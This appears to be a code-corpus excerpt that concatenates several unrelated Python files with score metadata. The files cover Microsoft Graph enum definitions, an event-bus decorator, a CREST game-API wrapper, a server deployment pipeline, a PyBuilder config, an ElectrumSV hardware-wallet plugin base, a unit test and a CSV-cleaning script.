CONTENT_TYPES = "contentTypes"
DRIVE = "drive"
DRIVES = "drives"
ITEMS = "items"
LISTS = "lists"
SITES = "sites"
ONENOTE = "onenote"
class Get8ItemsItem(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
ANALYTICS = "analytics"
COLUMNS = "columns"
CONTENT_TYPES = "contentTypes"
DRIVE = "drive"
DRIVES = "drives"
ITEMS = "items"
LISTS = "lists"
SITES = "sites"
ONENOTE = "onenote"
class MicrosoftGraphActionState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
NONE = "none"
PENDING = "pending"
CANCELED = "canceled"
ACTIVE = "active"
DONE = "done"
FAILED = "failed"
NOT_SUPPORTED = "notSupported"
class MicrosoftGraphAttendeeType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
REQUIRED = "required"
OPTIONAL = "optional"
RESOURCE = "resource"
class MicrosoftGraphAutomaticRepliesStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
DISABLED = "disabled"
ALWAYS_ENABLED = "alwaysEnabled"
SCHEDULED = "scheduled"
class MicrosoftGraphBodyType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
TEXT = "text"
HTML = "html"
class MicrosoftGraphCalendarColor(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
LIGHT_BLUE = "lightBlue"
LIGHT_GREEN = "lightGreen"
AUTO = "auto"
LIGHT_ORANGE = "lightOrange"
LIGHT_GRAY = "lightGray"
LIGHT_YELLOW = "lightYellow"
LIGHT_TEAL = "lightTeal"
LIGHT_PINK = "lightPink"
LIGHT_BROWN = "lightBrown"
LIGHT_RED = "lightRed"
MAX_COLOR = "maxColor"
class MicrosoftGraphCalendarRoleType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
NONE = "none"
FREE_BUSY_READ = "freeBusyRead"
LIMITED_READ = "limitedRead"
READ = "read"
WRITE = "write"
DELEGATE_WITHOUT_PRIVATE_EVENT_ACCESS = "delegateWithoutPrivateEventAccess"
DELEGATE_WITH_PRIVATE_EVENT_ACCESS = "delegateWithPrivateEventAccess"
CUSTOM = "custom"
class MicrosoftGraphCategoryColor(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
PRESET0 = "preset0"
PRESET1 = "preset1"
NONE = "none"
PRESET2 = "preset2"
PRESET3 = "preset3"
PRESET4 = "preset4"
PRESET5 = "preset5"
PRESET6 = "preset6"
PRESET7 = "preset7"
PRESET8 = "preset8"
PRESET9 = "preset9"
PRESET10 = "preset10"
PRESET11 = "preset11"
PRESET12 = "preset12"
PRESET13 = "preset13"
PRESET14 = "preset14"
PRESET15 = "preset15"
PRESET16 = "preset16"
PRESET17 = "preset17"
PRESET18 = "preset18"
PRESET19 = "preset19"
PRESET20 = "preset20"
PRESET21 = "preset21"
PRESET22 = "preset22"
PRESET23 = "preset23"
PRESET24 = "preset24"
class MicrosoftGraphChannelMembershipType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
STANDARD = "standard"
PRIVATE = "private"
UNKNOWN_FUTURE_VALUE = "unknownFutureValue"
class MicrosoftGraphChatMessageImportance(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
NORMAL = "normal"
HIGH = "high"
URGENT = "urgent"
UNKNOWN_FUTURE_VALUE = "unknownFutureValue"
class MicrosoftGraphChatMessagePolicyViolationDlpActionTypes(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
NONE = "none"
NOTIFY_SENDER = "notifySender"
BLOCK_ACCESS = "blockAccess"
BLOCK_ACCESS_EXTERNAL = "blockAccessExternal"
class MicrosoftGraphChatMessagePolicyViolationUserActionTypes(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
NONE = "none"
OVERRIDE = "override"
REPORT_FALSE_POSITIVE = "reportFalsePositive"
class MicrosoftGraphChatMessagePolicyViolationVerdictDetailsTypes(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
NONE = "none"
ALLOW_FALSE_POSITIVE_OVERRIDE = "allowFalsePositiveOverride"
ALLOW_OVERRIDE_WITHOUT_JUSTIFICATION = "allowOverrideWithoutJustification"
ALLOW_OVERRIDE_WITH_JUSTIFICATION = "allowOverrideWithJustification"
class MicrosoftGraphChatMessageType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
MESSAGE = "message"
CHAT_EVENT = "chatEvent"
TYPING = "typing"
UNKNOWN_FUTURE_VALUE = "unknownFutureValue"
class MicrosoftGraphComplianceState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
UNKNOWN = "unknown"
COMPLIANT = "compliant"
NONCOMPLIANT = "noncompliant"
CONFLICT = "conflict"
ERROR = "error"
IN_GRACE_PERIOD = "inGracePeriod"
CONFIG_MANAGER = "configManager"
class MicrosoftGraphComplianceStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
UNKNOWN = "unknown"
NOT_APPLICABLE = "notApplicable"
COMPLIANT = "compliant"
REMEDIATED = "remediated"
NON_COMPLIANT = "nonCompliant"
ERROR = "error"
CONFLICT = "conflict"
NOT_ASSIGNED = "notAssigned"
class MicrosoftGraphDayOfWeek(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
SUNDAY = "sunday"
MONDAY = "monday"
TUESDAY = "tuesday"
WEDNESDAY = "wednesday"
THURSDAY = "thursday"
FRIDAY = "friday"
SATURDAY = "saturday"
class MicrosoftGraphDelegateMeetingMessageDeliveryOptions(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
SEND_TO_DELEGATE_AND_INFORMATION_TO_PRINCIPAL = "sendToDelegateAndInformationToPrincipal"
SEND_TO_DELEGATE_AND_PRINCIPAL = "sendToDelegateAndPrincipal"
SEND_TO_DELEGATE_ONLY = "sendToDelegateOnly"
class MicrosoftGraphDeviceEnrollmentType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
UNKNOWN = "unknown"
USER_ENROLLMENT = "userEnrollment"
DEVICE_ENROLLMENT_MANAGER = "deviceEnrollmentManager"
APPLE_BULK_WITH_USER = "appleBulkWithUser"
APPLE_BULK_WITHOUT_USER = "appleBulkWithoutUser"
WINDOWS_AZURE_AD_JOIN = "windowsAzureADJoin"
WINDOWS_BULK_USERLESS = "windowsBulkUserless"
WINDOWS_AUTO_ENROLLMENT = "windowsAutoEnrollment"
WINDOWS_BULK_AZURE_DOMAIN_JOIN = "windowsBulkAzureDomainJoin"
WINDOWS_CO_MANAGEMENT = "windowsCoManagement"
class MicrosoftGraphDeviceManagementExchangeAccessState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
NONE = "none"
UNKNOWN = "unknown"
ALLOWED = "allowed"
BLOCKED = "blocked"
QUARANTINED = "quarantined"
class MicrosoftGraphDeviceManagementExchangeAccessStateReason(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
NONE = "none"
UNKNOWN = "unknown"
EXCHANGE_GLOBAL_RULE = "exchangeGlobalRule"
EXCHANGE_INDIVIDUAL_RULE = "exchangeIndividualRule"
EXCHANGE_DEVICE_RULE = "exchangeDeviceRule"
EXCHANGE_UPGRADE = "exchangeUpgrade"
EXCHANGE_MAILBOX_POLICY = "exchangeMailboxPolicy"
OTHER = "other"
COMPLIANT = "compliant"
NOT_COMPLIANT = "notCompliant"
NOT_ENROLLED = "notEnrolled"
UNKNOWN_LOCATION = "unknownLocation"
MFA_REQUIRED = "mfaRequired"
AZURE_AD_BLOCK_DUE_TO_ACCESS_POLICY = "azureADBlockDueToAccessPolicy"
COMPROMISED_PASSWORD = "compromisedPassword"
DEVICE_NOT_KNOWN_WITH_MANAGED_APP = "deviceNotKnownWithManagedApp"
class MicrosoftGraphDeviceRegistrationState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
NOT_REGISTERED = "notRegistered"
REGISTERED = "registered"
REVOKED = "revoked"
KEY_CONFLICT = "keyConflict"
APPROVAL_PENDING = "approvalPending"
CERTIFICATE_RESET = "certificateReset"
NOT_REGISTERED_PENDING_ENROLLMENT = "notRegisteredPendingEnrollment"
UNKNOWN = "unknown"
class MicrosoftGraphEventType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
SINGLE_INSTANCE = "singleInstance"
OCCURRENCE = "occurrence"
EXCEPTION = "exception"
SERIES_MASTER = "seriesMaster"
class MicrosoftGraphExternalAudienceScope(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
NONE = "none"
CONTACTS_ONLY = "contactsOnly"
ALL = "all"
class MicrosoftGraphFollowupFlagStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
NOT_FLAGGED = "notFlagged"
COMPLETE = "complete"
FLAGGED = "flagged"
class MicrosoftGraphFreeBusyStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
FREE = "free"
TENTATIVE = "tentative"
UNKNOWN = "unknown"
BUSY = "busy"
OOF = "oof"
WORKING_ELSEWHERE = "workingElsewhere"
class MicrosoftGraphGiphyRatingType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
STRICT = "strict"
MODERATE = "moderate"
UNKNOWN_FUTURE_VALUE = "unknownFutureValue"
class MicrosoftGraphImportance(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
LOW = "low"
NORMAL = "normal"
HIGH = "high"
class MicrosoftGraphInferenceClassificationType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
FOCUSED = "focused"
OTHER = "other"
class MicrosoftGraphLocationType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
DEFAULT = "default"
CONFERENCE_ROOM = "conferenceRoom"
HOME_ADDRESS = "homeAddress"
BUSINESS_ADDRESS = "businessAddress"
GEO_COORDINATES = "geoCoordinates"
STREET_ADDRESS = "streetAddress"
HOTEL = "hotel"
RESTAURANT = "restaurant"
LOCAL_BUSINESS = "localBusiness"
POSTAL_ADDRESS = "postalAddress"
class MicrosoftGraphLocationUniqueIdType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
UNKNOWN = "unknown"
LOCATION_STORE = "locationStore"
DIRECTORY = "directory"
PRIVATE = "private"
BING = "bing"
class MicrosoftGraphManagedAppFlaggedReason(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
NONE = "none"
ROOTED_DEVICE = "rootedDevice"
class MicrosoftGraphManagedDeviceOwnerType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
UNKNOWN = "unknown"
COMPANY = "company"
PERSONAL = "personal"
class MicrosoftGraphManagedDevicePartnerReportedHealthState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
UNKNOWN = "unknown"
ACTIVATED = "activated"
DEACTIVATED = "deactivated"
SECURED = "secured"
LOW_SEVERITY = "lowSeverity"
MEDIUM_SEVERITY = "mediumSeverity"
HIGH_SEVERITY = "highSeverity"
UNRESPONSIVE = "unresponsive"
COMPROMISED = "compromised"
MISCONFIGURED = "misconfigured"
class MicrosoftGraphManagementAgentType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
EAS = "eas"
MDM = "mdm"
EAS_MDM = "easMdm"
INTUNE_CLIENT = "intuneClient"
EAS_INTUNE_CLIENT = "easIntuneClient"
CONFIGURATION_MANAGER_CLIENT = "configurationManagerClient"
CONFIGURATION_MANAGER_CLIENT_MDM = "configurationManagerClientMdm"
CONFIGURATION_MANAGER_CLIENT_MDM_EAS = "configurationManagerClientMdmEas"
UNKNOWN = "unknown"
JAMF = "jamf"
GOOGLE_CLOUD_DEVICE_POLICY_CONTROLLER = "googleCloudDevicePolicyController"
class MicrosoftGraphMessageActionFlag(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ANY = "any"
CALL = "call"
DO_NOT_FORWARD = "doNotForward"
FOLLOW_UP = "followUp"
FYI = "fyi"
FORWARD = "forward"
NO_RESPONSE_NECESSARY = "noResponseNecessary"
READ = "read"
REPLY = "reply"
REPLY_TO_ALL = "replyToAll"
REVIEW = "review"
class MicrosoftGraphOnenotePatchActionType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
REPLACE = "Replace"
APPEND = "Append"
DELETE = "Delete"
INSERT = "Insert"
PREPEND = "Prepend"
class MicrosoftGraphOnenotePatchInsertPosition(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
AFTER = "After"
BEFORE = "Before"
class MicrosoftGraphOnenoteSourceService(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
UNKNOWN = "Unknown"
ONE_DRIVE = "OneDrive"
ONE_DRIVE_FOR_BUSINESS = "OneDriveForBusiness"
ON_PREM_ONE_DRIVE_FOR_BUSINESS = "OnPremOneDriveForBusiness"
class MicrosoftGraphOnenoteUserRole(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
OWNER = "Owner"
CONTRIBUTOR = "Contributor"
NONE = "None"
READER = "Reader"
class MicrosoftGraphOnlineMeetingProviderType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
UNKNOWN = "unknown"
SKYPE_FOR_BUSINESS = "skypeForBusiness"
SKYPE_FOR_CONSUMER = "skypeForConsumer"
TEAMS_FOR_BUSINESS = "teamsForBusiness"
class MicrosoftGraphOperationStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
NOT_STARTED = "NotStarted"
RUNNING = "Running"
COMPLETED = "Completed"
FAILED = "Failed"
class MicrosoftGraphPhoneType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
HOME = "home"
BUSINESS = "business"
MOBILE = "mobile"
OTHER = "other"
ASSISTANT = "assistant"
HOME_FAX = "homeFax"
BUSINESS_FAX = "businessFax"
OTHER_FAX = "otherFax"
PAGER = "pager"
RADIO = "radio"
class MicrosoftGraphPlannerPreviewType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
AUTOMATIC = "automatic"
NO_PREVIEW = "noPreview"
CHECKLIST = "checklist"
DESCRIPTION = "description"
REFERENCE = "reference"
class MicrosoftGraphPolicyPlatformType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ANDROID = "android"
I_OS = "iOS"
MAC_OS = "macOS"
WINDOWS_PHONE81 = "windowsPhone81"
WINDOWS81_AND_LATER = "windows81AndLater"
WINDOWS10_AND_LATER = "windows10AndLater"
ANDROID_WORK_PROFILE = "androidWorkProfile"
ALL = "all"
class MicrosoftGraphRecurrencePatternType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
DAILY = "daily"
WEEKLY = "weekly"
ABSOLUTE_MONTHLY = "absoluteMonthly"
RELATIVE_MONTHLY = "relativeMonthly"
ABSOLUTE_YEARLY = "absoluteYearly"
RELATIVE_YEARLY = "relativeYearly"
class MicrosoftGraphRecurrenceRangeType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
END_DATE = "endDate"
NO_END = "noEnd"
NUMBERED = "numbered"
class MicrosoftGraphResponseType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
NONE = "none"
ORGANIZER = "organizer"
TENTATIVELY_ACCEPTED = "tentativelyAccepted"
ACCEPTED = "accepted"
DECLINED = "declined"
NOT_RESPONDED = "notResponded"
class MicrosoftGraphScheduleChangeRequestActor(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
SENDER = "sender"
RECIPIENT = "recipient"
MANAGER = "manager"
SYSTEM = "system"
UNKNOWN_FUTURE_VALUE = "unknownFutureValue"
class MicrosoftGraphScheduleChangeState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
PENDING = "pending"
APPROVED = "approved"
DECLINED = "declined"
UNKNOWN_FUTURE_VALUE = "unknownFutureValue"
class MicrosoftGraphScheduleEntityTheme(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
WHITE = "white"
BLUE = "blue"
GREEN = "green"
PURPLE = "purple"
PINK = "pink"
YELLOW = "yellow"
GRAY = "gray"
DARK_BLUE = "darkBlue"
DARK_GREEN = "darkGreen"
DARK_PURPLE = "darkPurple"
DARK_PINK = "darkPink"
DARK_YELLOW = "darkYellow"
UNKNOWN_FUTURE_VALUE = "unknownFutureValue"
class MicrosoftGraphSelectionLikelihoodInfo(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
NOT_SPECIFIED = "notSpecified"
HIGH = "high"
class MicrosoftGraphSensitivity(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
NORMAL = "normal"
PERSONAL = "personal"
PRIVATE = "private"
CONFIDENTIAL = "confidential"
class MicrosoftGraphStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ACTIVE = "active"
UPDATED = "updated"
DELETED = "deleted"
IGNORED = "ignored"
UNKNOWN_FUTURE_VALUE = "unknownFutureValue"
class MicrosoftGraphTeamsAppDistributionMethod(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
STORE = "store"
ORGANIZATION = "organization"
SIDELOADED = "sideloaded"
UNKNOWN_FUTURE_VALUE = "unknownFutureValue"
class MicrosoftGraphTeamsAsyncOperationStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
INVALID = "invalid"
NOT_STARTED = "notStarted"
IN_PROGRESS = "inProgress"
SUCCEEDED = "succeeded"
FAILED = "failed"
UNKNOWN_FUTURE_VALUE = "unknownFutureValue"
class MicrosoftGraphTeamsAsyncOperationType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
INVALID = "invalid"
CLONE_TEAM = "cloneTeam"
ARCHIVE_TEAM = "archiveTeam"
UNARCHIVE_TEAM = "unarchiveTeam"
CREATE_TEAM = "createTeam"
UNKNOWN_FUTURE_VALUE = "unknownFutureValue"
class MicrosoftGraphTeamSpecialization(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
NONE = "none"
EDUCATION_STANDARD = "educationStandard"
EDUCATION_CLASS = "educationClass"
EDUCATION_PROFESSIONAL_LEARNING_COMMUNITY = "educationProfessionalLearningCommunity"
EDUCATION_STAFF = "educationStaff"
HEALTHCARE_STANDARD = "healthcareStandard"
HEALTHCARE_CARE_COORDINATION = "healthcareCareCoordination"
UNKNOWN_FUTURE_VALUE = "unknownFutureValue"
class MicrosoftGraphTeamVisibilityType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
PRIVATE = "private"
PUBLIC = "public"
HIDDEN_MEMBERSHIP = "hiddenMembership"
UNKNOWN_FUTURE_VALUE = "unknownFutureValue"
class MicrosoftGraphTimeOffReasonIconType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
NONE = "none"
CAR = "car"
CALENDAR = "calendar"
RUNNING = "running"
PLANE = "plane"
FIRST_AID = "firstAid"
DOCTOR = "doctor"
NOT_WORKING = "notWorking"
CLOCK = "clock"
JURY_DUTY = "juryDuty"
GLOBE = "globe"
CUP = "cup"
PHONE = "phone"
WEATHER = "weather"
UMBRELLA = "umbrella"
PIGGY_BANK = "piggyBank"
DOG = "dog"
CAKE = "cake"
TRAFFIC_CONE = "trafficCone"
PIN = "pin"
SUNNY = "sunny"
UNKNOWN_FUTURE_VALUE = "unknownFutureValue"
class MicrosoftGraphWebsiteType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
OTHER = "other"
HOME = "home"
WORK = "work"
BLOG = "blog"
PROFILE = "profile"
class MicrosoftGraphWeekIndex(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
FIRST = "first"
SECOND = "second"
THIRD = "third"
FOURTH = "fourth"
LAST = "last"
class MicrosoftGraphWorkbookOperationStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
NOT_STARTED = "notStarted"
RUNNING = "running"
SUCCEEDED = "succeeded"
FAILED = "failed"
| 2.15625 | 2 |
evntbus/decorators.py | jmwri/eventbus | 0 | 17650 | import typing
if typing.TYPE_CHECKING:
from evntbus.bus import Bus
def listen_decorator(evntbus: 'Bus'):
class ListenDecorator(object):
def __init__(self, event: typing.Type, priority: int = 5):
self.event = event
self.priority = priority
def __call__(self, f: typing.Callable) -> typing.Callable:
evntbus.listen(self.event, f, self.priority)
return f
return ListenDecorator
| 2.890625 | 3 |
src/shortcircuit/model/crestprocessor.py | farshield/shortcircu | 35 | 17651 | <gh_stars>10-100
# crestprocessor.py
import threading
from PySide import QtCore
from crest.crest import Crest
class CrestProcessor(QtCore.QObject):
"""
CREST Middle-ware
"""
login_response = QtCore.Signal(str)
logout_response = QtCore.Signal()
location_response = QtCore.Signal(str)
destination_response = QtCore.Signal(bool)
def __init__(self, implicit, client_id, client_secret, parent=None):
super(CrestProcessor, self).__init__(parent)
self.crest = Crest(implicit, client_id, client_secret, self._login_callback, self._logout_callback)
def login(self):
return self.crest.start_server()
def logout(self):
self.crest.logout()
def get_location(self):
server_thread = threading.Thread(target=self._get_location)
server_thread.setDaemon(True)
server_thread.start()
def _get_location(self):
location = self.crest.get_char_location()
self.location_response.emit(location)
def set_destination(self, sys_id):
server_thread = threading.Thread(target=self._set_destination, args=(sys_id, ))
server_thread.setDaemon(True)
server_thread.start()
def _set_destination(self, sys_id):
response = self.crest.set_char_destination(sys_id)
self.destination_response.emit(response)
def _login_callback(self, char_name):
self.login_response.emit(char_name)
def _logout_callback(self):
self.logout_response.emit()
| 2.375 | 2 |
src/commands/pipelines.py | vicobits/sawi-cli | 1 | 17652 | <reponame>vicobits/sawi-cli
# -*- coding: utf-8 -*-
import click
from src.commands.project import Project
from src.commands.server import Server
from src.commands.config import WebServer
from src.common.context import CommandContext
from src.common.decorators import settings, update_config_file
class Pipeline:
@staticmethod
@settings(allow_sudo=True)
def update(context: CommandContext):
context.connection.sudo('apt-get update')
context.connection.sudo('apt-get upgrade -y')
@staticmethod
@settings(allow_sudo=True)
def deps(context: CommandContext):
Server.deps(context)
@staticmethod
@settings(allow_sudo=True)
def setup_server(context: CommandContext):
Server.deps(context)
Server.user(context)
Server.group(context)
Server.layout(context)
Server.create_db(context)
Server.fix_permissions(context)
Server.git(context)
Server.add_remote(context)
Server.web_server(context)
Server.gunicorn(context)
Server.supervisor(context)
Server.fix_permissions(context)
Server.letsencrypt(context)
@staticmethod
@settings(allow_sudo=True)
def clean_server(context: CommandContext):
"""
Uninstall app in selected server(s)
"""
Server.clean(context)
@staticmethod
@settings(allow_sudo=True)
def restart_server(context: CommandContext):
"""
Restart all app services.
"""
Server.restart_services(context)
@staticmethod
@settings()
def deploy(context: CommandContext):
Project.push(context)
Project.environment(context)
Project.install(context)
Project.clean(context)
@staticmethod
@settings(allow_sudo=True)
def fix_permissions(context: CommandContext):
Server.fix_permissions(context)
@staticmethod
@settings()
def add_remote(context: CommandContext):
Server.add_remote(context)
@staticmethod
@settings(allow_sudo=True)
def createsuperuser(context: CommandContext):
"""
Create a project superuser in selected server(s).
"""
Project.create_superuser(context)
@staticmethod
@settings()
def run_command(context: CommandContext, command):
Project.run_command(context, command)
@staticmethod
@settings()
def migrate(context: CommandContext):
Project.migrate(context)
@staticmethod
@settings()
def load_fixtures(context: CommandContext):
Project.load_fixtures(context)
@staticmethod
@settings(only_local=True)
def upload_sshkey(context: CommandContext):
"""
Upload SSH key to server.
"""
Project.upload_key(context)
@staticmethod
@settings(allow_sudo=True)
def setup_ssl(context: CommandContext, artifact=None):
if artifact:
if not context.config.https:
is_agree = input(
'We will change the value of [https] in your config file, Are you agree? Y/n: '
) or 'n'
if is_agree.upper() == "Y":
update_config_file(key="https", value=True)
if artifact == 'renew':
Server.renew_ssl(context)
elif artifact == WebServer.NGINX.value:
Server.nginx(context)
else:
click.echo(click.style('[{0}] doesn\'t implemented'.format(artifact), fg='red'))
else:
Server.certbot(context)
Server.letsencrypt(context)
@staticmethod
@settings(allow_sudo=True)
def server_language(context: CommandContext):
if context.connection.run('echo $LANG').ok:
context.connection.sudo('echo "LANG=C.UTF-8" >> /etc/environment')
if context.connection.run('echo $LC_CTYPE').ok:
context.connection.sudo('echo "LC_CTYPE=C.UTF-8" >> /etc/environment')
if context.connection.run('echo $LC_ALL').ok:
context.connection.sudo('echo "LC_ALL=C.UTF-8" >> /etc/environment')
@staticmethod
@settings(allow_sudo=True)
def reset_db(context: CommandContext):
Server.reset_db(context)
# @classmethod
# def make_backup(cls):
# Global.set_user(superuser=True)
# with settings(hide('warnings'), warn_only=True):
# execute(Project.backup, hosts=env.hosts)
# execute(Project.download_backup, hosts=env.hosts)
#
| 1.875 | 2 |
build.py | jmetzz/coffee-chatbot | 0 | 17653 | <filename>build.py
from pybuilder.core import use_plugin, init
use_plugin("python.core")
use_plugin("python.unittest")
use_plugin("python.install_dependencies")
use_plugin("python.flake8")
use_plugin("python.coverage")
name = "ActionServerPybuilder"
default_task = ['install_dependencies', 'analyze', 'publish']
@init
def set_properties(project):
project.build_depends_on('tblib')
project.build_depends_on('mockito')
project.build_depends_on('parameterized')
project.build_depends_on('responses')
@init
def initialize_flake8_plugin(project):
project.build_depends_on("flake8")
project.set_property('unittest_module_glob', 'test_*')
project.set_property("flake8_verbose_output", True)
project.set_property("flake8_break_build", True)
project.set_property("flake8_max_line_length", 120)
project.set_property("flake8_exclude_patterns", None)
project.set_property("flake8_include_test_sources", False)
project.set_property("flake8_include_scripts", False)
@init
def initialize_coverage_plugin(project):
project.set_property('coverage_break_build', False)
project.set_property('coverage_threshold_warn', 80)
# for now, code coverage does not break the build
# as we do Python, a scripted language, you have to aim for 100% coverage!
project.set_property("coverage_exceptions", ['endpoint'])
| 2.265625 | 2 |
electrumsv/devices/hw_wallet/plugin.py | tuoshao/electrumsv | 1 | 17654 | #!/usr/bin/env python2
# -*- mode: python -*-
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2016 The Electrum developers
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import threading
from electrumsv.i18n import _
from electrumsv.logs import logs
from electrumsv.util import versiontuple
from .cmdline import CmdLineHandler
class HW_PluginBase(object):
hid_lock = threading.Lock()
def __init__(self, device_kind):
self.device = self.keystore_class.device
self.name = device_kind
self.logger = logs.get_logger(device_kind)
def create_keystore(self, d):
keystore = self.keystore_class(d)
keystore.plugin = self
# This should be replaced when a window is opened in the gui
keystore.gui_handler = CmdLineHandler()
return keystore
def is_enabled(self):
return True
def get_library_version(self) -> str:
"""Returns the version of the 3rd party python library
for the hw wallet. For example '0.9.0'
Returns 'unknown' if library is found but cannot determine version.
Raises 'ImportError' if library is not found.
Raises 'LibraryFoundButUnusable' if found but there was a problem (includes version num).
"""
raise NotImplementedError()
def check_libraries_available(self) -> bool:
def version_str(t):
return ".".join(str(i) for i in t)
try:
# this might raise ImportError or LibraryFoundButUnusable
library_version = self.get_library_version()
# if no exception so far, we might still raise LibraryFoundButUnusable
if (library_version == 'unknown' or
versiontuple(library_version) < self.minimum_library or
hasattr(self, "maximum_library") and
versiontuple(library_version) >= self.maximum_library):
raise LibraryFoundButUnusable(library_version=library_version)
except ImportError:
return False
except LibraryFoundButUnusable as e:
library_version = e.library_version
max_version_str = (version_str(self.maximum_library)
if hasattr(self, "maximum_library") else "inf")
self.libraries_available_message = (
_("Library version for '{}' is incompatible.").format(self.name)
+ '\nInstalled: {}, Needed: {} <= x < {}'
.format(library_version, version_str(self.minimum_library), max_version_str))
self.logger.warning(self.libraries_available_message)
return False
return True
def get_library_not_available_message(self) -> str:
if hasattr(self, 'libraries_available_message'):
message = self.libraries_available_message
else:
message = _("Missing libraries for {}.").format(self.name)
message += '\n' + _("Make sure you install it with python3")
return message
def enumerate_devices(self):
raise NotImplementedError
class LibraryFoundButUnusable(Exception):
def __init__(self, library_version='unknown'):
super().__init__()
self.library_version = library_version
| 1.726563 | 2 |
api_service/tests/test_model_ids.py | seattleflu/Seattle-Flu-Incidence-Mapper | 6 | 17655 | <reponame>seattleflu/Seattle-Flu-Incidence-Mapper
import unittest
from seattle_flu_incidence_mapper.utils import get_model_id
class TestGetIdFromQuery(unittest.TestCase):
def test_ids_match_expected(self):
ids = {
"f39442e6883958971ecc1d0213c59f91": {"model_type":"inla","observed":["encountered_week","flu_shot","PUMA5CE","sampling_location"],"pathogen":["vic"]},
"29cc23488ba96c938113852c28b55c13": {"model_type":"inla latent","observed":["encountered_week","pathogen","PUMA5CE"],"pathogen":["vic"]}
}
for id, query_obj in ids.items():
gen_id = get_model_id(query_obj)
self.assertEqual(id, gen_id)
| 2.6875 | 3 |
Cleaning.py | TharindraParanagama/MovieClassification | 0 | 17656 | import csv
input = open('MovieI.csv', 'rb')
output = open('MovieO.csv', 'wb')
writer = csv.writer(output)
for row in csv.reader(input):
for i in range(len(row)):
if(row[0]==''):
break
elif(row[1]==''):
break
elif(row[2]==''):
break
elif(row[3]==''):
break
elif(row[4]==''):
break
else :writer.writerow(row)
input.close()
output.close() | 3.265625 | 3 |
